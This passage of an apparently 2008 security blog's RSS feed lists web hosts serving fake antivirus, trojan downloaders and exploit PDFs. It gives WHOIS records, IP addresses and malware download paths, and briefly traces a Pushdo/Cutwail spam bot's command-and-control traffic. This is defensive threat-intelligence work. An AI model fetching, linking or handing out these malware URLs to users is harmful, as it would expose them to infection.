<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/177/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=177&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/17/sources-of-badness-starline-web-services/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>

		<media:content url="http://realsecurity.files.wordpress.com/2008/12/small.jpg" medium="image">
			<media:title type="html">small</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; PortNAP</title>
		<link>http://realsecurity.wordpress.com/2008/12/16/sources-of-badness-portnap/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/16/sources-of-badness-portnap/#comments</comments>
		<pubDate>Tue, 16 Dec 2008 15:05:27 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=172</guid>
		<description><![CDATA[One of the smaller hosts I&#8217;ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We&#8217;ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 &#8211; 84.243.197.255. inetnum: 84.243.197.0 - 84.243.197.255 netname: GFX-CUST-PORTNAP descr: PortNAP Internet Services org: ORG-PIS13-RIPE [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=172&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>One of the smaller hosts I&#8217;ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We&#8217;ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 &#8211; 84.243.197.255.</p>
<pre>
inetnum:        84.243.197.0 - 84.243.197.255
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed:        noc@grafix.nl 20081021
source:         RIPE
abuse-mailbox:  abuse@grafix.nl
</pre>
<p>
<strong>84.243.196.136	</strong>2008-12-02 &#8211; site down<br />
pro-scanner-online.com	/2009/download/trial/A9installer_880473.exe</p>
<p><strong>84.243.196.137</strong>	2008-12-02 &#8211; site down<br />
protected-downloads.com	/download/trial/AV360Install_77014205.exe<br />
<strong><br />
84.243.197.183</strong>	2008-11-20 &#8211; site down<br />
protection-livescan.com	/2009/download/trial/A9installer_880290.exe</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/172/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/172/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/172/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=172&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/16/sources-of-badness-portnap/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; ZlKon</title>
		<link>http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/#comments</comments>
		<pubDate>Mon, 15 Dec 2008 17:27:30 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[renos]]></category>
		<category><![CDATA[zlkon]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=160</guid>
		<description><![CDATA[After a weekend hiatus, I&#8217;m back with the next host of interest &#8211; ZlKon. role: ZlKon HostMaster address: Lilijas iela 4-74 address: Riga, LV-1055 address: Latvija phone: +371 26330593 e-mail: hostmaster@zlkon.lv admin-c: AD5952-RIPE tech-c: AD5952-RIPE nic-hdl: ZK508-RIPE mnt-by: ZLKON-MNT changed: hostmaster@zlkon.lv 20081125 source: RIPE abuse-mailbox: abuse@zlkon.lv Based in Latvia, Zlkon seems to have a high [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=160&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>After a weekend hiatus, I&#8217;m back with the next host of interest &#8211; ZlKon.</p>
<pre>role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
e-mail:         hostmaster@zlkon.lv
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed:        hostmaster@zlkon.lv 20081125
source:         RIPE
abuse-mailbox:  abuse@zlkon.lv
</pre>
<p></p>
<p>Based in Latvia, Zlkon seems to have a high ratio of bad IPs to it&#8217;s small<br />
address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon<br />
has two /24s 94.247.2.0 &#8211; 94.247.3.255. </p>
<pre>
% Information related to '94.247.0.0/21AS12553'

route:          94.247.0.0/21
descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed:        igors@pcexpress.lv 20081121
source:         RIPE
</pre>
<p></p>
<p><strong>94.247.2.11</strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com /2009/download/trial/A9installer_880135.exe</p>
<p><strong>94.247.2.183</strong><br />
2008-12-09<br />
fire-movie.com 	/download/Keygen.Image.for.DOS.2.08c3098.exe<br />
<a href="http://www.virustotal.com/analisis/f6933782ad9f255bf135068ab7e80541" target="_blank">Win32:Fabot<br />
Trojan:Win32/Alureon.gen!J<br />
Worm/AutoRun.ER</a> </p>
<p>2008-12-02<br />
spacekeys.net	/download/windows311megaupload_3019.exe<br />
Same as fire-movie.net above</p>
<p>2008-12-12<br />
moonmovie.net	/download/moonmovie.v.3.484.exe<br />
Same as fire-movie.net above</p>
<p><strong>94.247.2.215 </strong><br />
2008-11-27 &#8211; not accessible<br />
antivirus&#8211;plus.com /installer_00004.exe</p>
<p><strong>94.247.2.222 </strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com/2009/download/trial/A9installer_880147.exe</p>
<p><strong>94.247.3.228</strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com/2009/download/trial/A9installer_880473.exe</p>
<p>2008-12-12<br />
get-frsh-files.com       /MCLiteodecVer.6.20467.exe<br />
Same as files-upload.21.com below</p>
<p>2008-12-13<br />
files-upload-21.com	/MCLiteodecVer.6.20271.exe<br />
<a href="http://www.virustotal.com/analisis/f8dc8efc3e085aa44630ac361197e1b5" target="_blank">TrojanDownloader:Win32/Renos.FH</a></p>
<p><strong>94.247.2.231</strong><br />
2008-12-03 &#8211; not accessible<br />
pro-scanner-online.com	/2009/download/trial/A9installer_880147.exe</p>
<p><strong>94.247.3.232</strong><br />
2008-12-14<br />
codecdownload.3d-softwareportal.com	/exclusivemovie.1518.exe<br />
<a href="http://www.virustotal.com/analisis/f926b5759d120a973f6451506634c0f1" target="_blank">TrojanDownloader:Win32/Renos.FU<br />
Trojan.Win32.Undef.uhx</a></p>
<p>So we&#8217;ve got some fake antivirus, Renos, zlob, etc. Nothing overly terrible like a banking trojan or spam bot but who knows what else is being hosted in Zlkon&#8217;s address space.</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/160/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/160/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/160/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=160&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; UATelecom</title>
		<link>http://realsecurity.wordpress.com/2008/12/12/sources-of-badness-uatelecom/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/12/sources-of-badness-uatelecom/#comments</comments>
		<pubDate>Fri, 12 Dec 2008 18:28:39 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=151</guid>
		<description><![CDATA[The next source of badness I&#8217;ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German) 91.203.92.0/22 AS44997 netname: BASTION-NET descr: ISP UATelecom country: EU organisation: ORG-TG39-RIPE org-name: UATELECOM LLC. org-type: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=151&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The next source of badness I&#8217;ll cover is<strong> UATelecom (AS44997)</strong>. With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about <a href="http://www.abuse.ch/?p=483">here (written in German)</a></p>
<p>91.203.92.0/22<br />
AS44997</p>
<p>netname:        BASTION-NET<br />
descr:          ISP UATelecom<br />
country:        EU<br />
organisation:   ORG-TG39-RIPE<br />
org-name:       UATELECOM LLC.<br />
org-type:       OTHER<br />
address:        Ukraine, Voznesensk, Lenina 52<br />
remarks:        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
phone:          +38-048-701-05-45<br />
phone:          +38-096-380-13-21<br />
phone:          +38-096-380-13-26<br />
fax-no:         +38-048-701-05-45<br />
remarks:        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
e-mail:         ipadmin@uatelecom.com.ua<br />
abuse-mailbox:  abuse@uatelecom.com.ua</p>
<p>We&#8217;ve seen lots of malware from their netblock:</p>
<p><strong>91.203.92.138    2008-10-30 </strong> &#8211; site down<br />
91.203.92.138    /mix/xcvb.pdf</p>
<p><strong>91.203.92.47    2008-12-09 </strong> &#8211; site down<br />
advancedscanner.com    /2009/download/trial/InstallAVv_880460.exe</p>
<p><strong>91.203.93.25    2008-12-02</strong><br />
softwareformyvideo.com    /get/1xxx5912940/download.exe</p>
<p><a href="http://www.virustotal.com/analisis/0a03d64d760fb669ff7b0ac774183b1a">Trojan-Dropper.Win32.Agent.abiq<br />
TrojanDownloader:Win32/Renos.FS<br />
Troj/Zlob-AOX</a></p>
<p><strong>91.203.93.26    2008-12-02</strong><br />
91.203.93.26    /WinDefender2009.exe &#8211; fake AV</p>
<p><a href="http://www.virustotal.com/analisis/7d5518569772757323367de0c3db9671">FraudTool.Win32.WinDefender.g<br />
AntiVirus2008.AIJ</a></p>
<p><strong>91.203.93.29    2008-12-03</strong> (more on this below)<br />
easywebsiteauditor.ru    /spl/load.php &#8211; SPAM Bot</p>
<p><a href="http://www.virustotal.com/analisis/88717ce59ca1b2fccbe39f4c6529aee4">Troj/Pushdo-G<br />
TrojanDownloader:Win32/Cutwail.S<br />
Trojan.Win32.Small.yrx</a></p>
<p>load.php (an exe) is downloaded from the index of /spl/. The exploit code has <a href="http://www.virustotal.com/analisis/f69e42a8360ac765febbe9dec45bb51d">2/38 detections, JS:Packed-X</a></p>
<p><strong>91.203.93.68    2008-12-03</strong> &#8211; site down<br />
pcantivirusscan.com    /2009/download/trial/A9installertest_880135.exe</p>
<p><strong>91.203.93.81    2008-11-27 </strong>- sites down<br />
codecdownload.x-softportal.com    /k-codec.335.exe<br />
2008-12-02     codecdownload.friendlysoftportal.com    /moviecodec.91.exe<br />
2008-12-04     codecdownload.allfilesherefordownload.com    /moviecodec.136.exe</p>
<p>Since easywebsiteauditor.ru drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to 174.36.201.82</p>
<pre>OrgName:    SoftLayer Technologies Inc.
OrgID:      <a href="http://private.dnsstuff.com/tools/whois.ch?ip=%21SOFTL&amp;server=whois.arin.net&amp;type=O">SOFTL</a>
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US</pre>
<p>GET /40E8001430303030303030303030303030303030303031306C00000<br />
1A366000000007600000642EB00053098A9B3BE HTTP/1.0</p>
<p>HTTP/1.0 200 OK<br />
Date: Fri, 12 Dec 2008 16:10:22 GMT<br />
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9<br />
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT<br />
Cache-Control: no-cache<br />
Content-Length: 110604<br />
Connection: close<br />
Content-Type: application/octet-stream</p>
<p>The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various smtp servers and starts to send spam. There is also a side channel of some sort that it establishes to 69.46.20.65 over port 2065.</p>
<pre>OrgName:    HIVELOCITY VENTURES CORP
OrgID:      <a href="http://private.dnsstuff.com/tools/whois.ch?ip=%21HVC-3&amp;server=whois.arin.net&amp;type=O">HVC-3</a>
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US</pre>
<p>This traffic also seems obfuscated with the only readable string below:</p>
<p>L&#8230;..9ifnospam.0.exe_url..exe_url&#8230;&#8230;..</p>
<p>From doing a little digigng, this threat really is Pushdo/Cutwail. It&#8217;s interesting that the exploit site is hosted in the Ukraine, but the C&amp;Cs are located in the US.</p>
<p><a href="http://blog.fireeye.com/research/2008/12/kill-pushdo-to-kill-spam.html">Fireeye article</a><br />
<a href="http://www.secureworks.com/research/threats/pushdo/?threat=pushdo">Secure Works article</a></p>
<p>Happy hunting!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=151&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/12/sources-of-badness-uatelecom/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; LeaseWeb</title>
		<link>http://realsecurity.wordpress.com/2008/12/11/sources-of-badness-leaseweb/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/11/sources-of-badness-leaseweb/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 16:32:11 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[leaseweb]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=139</guid>
		<description><![CDATA[**Edit 2** I&#8217;d like to thank LeaseWeb for taking the time to respond to this post. It&#8217;s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The &#8220;fire and forget&#8221; mentality of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=139&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>**Edit 2**</p>
<p>I&#8217;d like to thank LeaseWeb for taking the time to respond to this post. It&#8217;s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The &#8220;fire and forget&#8221; mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community will prosper.</p>
<p>**Edit** Seems this post has already drummed up some interest from several parties.</p>
<p>Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.</p>
<p>Is all of LeaseWeb&#8217;s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way, I&#8217;m sure policing such a large address space has it&#8217;s challenges.</p>
<p>The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.</p>
<p>**Edit**</p>
<p>Given the recent interest in web hosts such as MCCOLO and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list, it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.</p>
<p>If I had more hosts, maybe I could call this series of articles &#8220;The week of shady web hosts&#8221; <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
Today&#8217;s host is <strong>AS16265 LeaseWeb AS Amsterdam, Netherlands.</strong></p>
<pre>netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
descr:          www.leaseweb.com
remarks:        Please send email to "abuse@leaseweb.com" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed:        ripe@leaseweb.com 20071015
source:         RIPE

Information related to '85.17.0.0/16AS16265'

route:          85.17.0.0/16
descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed:        ripe@ocom.com 20050311
changed:        ripe@ocom.com 20070610
source:         RIPE</pre>
<p>We&#8217;ve got exploits and hostile payloads from several IPs in their ranges.<br />
I haven&#8217;t had a chance to get virus total results however.</p>
<pre>85.17.212.0 - 85.17.212.255
85.17.162.0 - 85.17.162.255
85.17.189.0 - 85.17.189.255
85.17.238.0 - 85.17.238.255

<strong>IP              Date       Domain/IP            URL</strong>

85.17.162.100   2008-12-08 ad-adnet.net		/xrun.tmp (exe payload)
                2008-11-06 infonews.ath.cx	/data.pdf (exploit)
85.17.212.137	2008-12-01 www.golfinau.com	/stat/index.htm (exploit)
85.17.212.134	2008-12-09 securefilecourier.com	/downloadsetupws.php (exe payload)
85.17.189.153	2008-10-14 www.zifirgad.info	/n_fia/pdf.php (exploit)
85.17.238.144	2008-12-03 85.17.238.144	/74812/a.php (exe payload)

Xentronix network (LeaseWeb)
85.17.166.128 - 85.17.166.255

85.17.166.139	2008-11-05 85.17.166.139	/css/pdf.php (exploit)
85.17.166.229	2008-09-19 85.17.166.229	/gtest2/pdf.php (exploit)
85.17.166.231	2008-10-15 85.17.166.231	/gtest2/pdf.php (exploit)</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/139/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=139&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/11/sources-of-badness-leaseweb/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
	</channel>
</rss>
